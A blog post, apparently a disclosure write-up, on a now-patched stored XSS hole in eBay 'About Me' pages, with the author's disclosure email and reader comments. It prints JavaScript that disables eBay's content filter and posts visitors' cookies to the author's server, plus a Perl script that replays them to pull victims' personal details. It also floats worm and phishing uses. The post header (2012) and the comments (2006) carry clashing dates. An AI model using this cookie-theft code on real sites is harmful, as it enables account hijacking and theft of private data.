eBay XSS

2012/07/05 filed under /web

Sometimes, when someone bugs you, you'd like to find a way around the bugging. I am not alone in this; take BugMeNot, for example.

A few days ago, I had to figure out a way to put the right information at an eBay About Me page concerning an eBay store.

The easiest option would be to redirect the user to the official website, yet eBay doesn't allow that kind of JavaScript on there. A link could be put up, but that wouldn't be nice, since you'd force the user to click it before showing the real content. The fact that the JavaScript I "needed" was being blocked looked like a promising challenge. How to bypass that? I soon found out, but then I figured more was probably possible.

Time to refresh my knowledge and try a few things. An easy hack was to use this piece of code:


Now we could do a little more, the easy way: including a JavaScript file would speed up the whole debugging of the site. Too bad a lot of stuff would still be blocked, but that blocking was done by JavaScript itself! Time to disable the block. So in my evilness.js I would start with:

// empty eBay's client-side list of blocked active content
ebay.oDocument._getControl("blockActiveContent").aBlocks = Array();

Now the list of blocked active content would be an empty array, meaning we can insert anything we like: iframes, document.cookie and everything else. Yay!

So, why not grab the user's cookies and put them in a form?

// write a hidden form into the page (the action URL is left blank here; it pointed at our own server)
document.write('<form action="" ');
document.write('id="f" method="post">');
document.write('<input type="hidden" name="q" value="" id="q" />');

// copy the user's cookies into the hidden field
var q = document.getElementById('q').value = document.cookie;


Sweet, now the user will be submitting a form with his cookie contents to us. Let's see if we can use that information! (Of course we can, otherwise I wouldn't be blogging this ;-)


use strict;
use CGI qw/:standard/;
use LWP::Simple qw/$ua get/;

my $q = new CGI;

# replay the cookie value posted by the hidden form on our own request
$ua->default_headers->push_header('Cookie' => $q->param('q'));

# fetch the victim's personal page using that cookie
my $personal_info = get(''.

That's basically all it takes to retrieve the personal page of the user who just fell into our trap. Using his cookies, we'll be served with all his information (email address, street address, username, etc.). Of course we could make this into a worm, by putting the little JavaScript form into the victim's About Me page too.

I don't really care about all of this information, and for "the good stuff" such as passwords and credit card info you'd still need the user's password, but hey, we already have his full address (usually with full name), his email address and username, so a phishing site can be set up in seconds!

... I wonder how many people use the same password on eBay and PayPal ...

Note: all of this was created just for the fun of bypassing roadblocks, and I expect eBay to terminate your account immediately after finding stuff like this in your profile, so I do not advise you to use such tactics! Another thing is that your "victim" has to be logged in for this, but a lot of them will be.

Of course, I contacted eBay about this exploit and wrote them the following:

Dear sirs,

Recently I noticed I was able to use JavaScript on my 'About Me' page, using an XSS tactic. This way, I was able to pass on cookies to a third party server (mine in this matter) and use those cookies from there to access information about the user account.

I have tested this setup as I describe here: http://url and it does work flawlessly. I could gather username, address, email info from my own account as well as some friends' accounts (with their cooperation and permission). I also think I'd be able to make a worm out of this, infecting every visitor's 'About Me' page.

The solution, IMHO, is quite easy. Stop allowing JavaScript in the About Me page and actually filter it out before you store it in the databases.

I would like to hear from you regarding this privacy matter and will not post this blog entry (see URL above) as of yet, to prevent script kiddies from abusing it. I will post it on Monday, leaving you with enough time to contact me.

If you do need more time for patching the system, I'm willing to wait even longer before posting the info on my blog.

Kind Regards,

How nice of me. But unfortunately, I haven't heard from eBay so far, except for them scanning my system from a few different IP addresses. Now, according to eBay time it's Monday, so let's unleash this information!

I really thought eBay would care enough about your privacy, yet they don't even have the decency to email me ...

Update: After publication on WebWereld, eBay finally deemed it necessary to email me. They claim never to have received my initial email. Weird, because my website logs show me that at least 4 different IP addresses have requested the "secret" URL I created for them. So I guess at least four people didn't receive my email ...

This hole is patched for now, yet a simple alert('Hello World') can still be posted, so JavaScript has not been disabled fully.

Posted by: B10m


"dem npfdd seine Buchstabendeponie" mentioned this post in "XSS":

B10[m|g] recently published a beautiful guide to cross-site scripting on eBay. Two things I'd like to say about it: first, eBay's response time is remarkable. Second, compared with eBay, mySpace is a security hole in itself. Custom scripts etc. are explicitly allowed there and used intensively. Think about it.


Dosvedanya wrote at 2006-10-02 09:28:

Nice! I'm a real noob at programming but I understand what you've done.

BOK wrote at 2006-10-03 10:36:

I got an account at eGay, but I've always been too chicken to use it. Now I remember once again why it's sometimes good to be chicken...
Nice one B10m, too bad it had to go to Webwereld first. I can't see WHY people have to be so ignorant at first. Oh wait, the USofA did the same in the early 2000's regarding Al-Qaida too, right? ;-)

B10m wrote at 2006-10-03 20:08:

To clarify: I have not, nor have I ever had, anything to do with Al-Qaida ;-) But yeah, it's a shame it had to go like this.

I can say though that an eBay representative did thank me for contacting them (and finding the hole). He told me he'd check the internal communication flow, for he kept claiming never to have received my initial email.
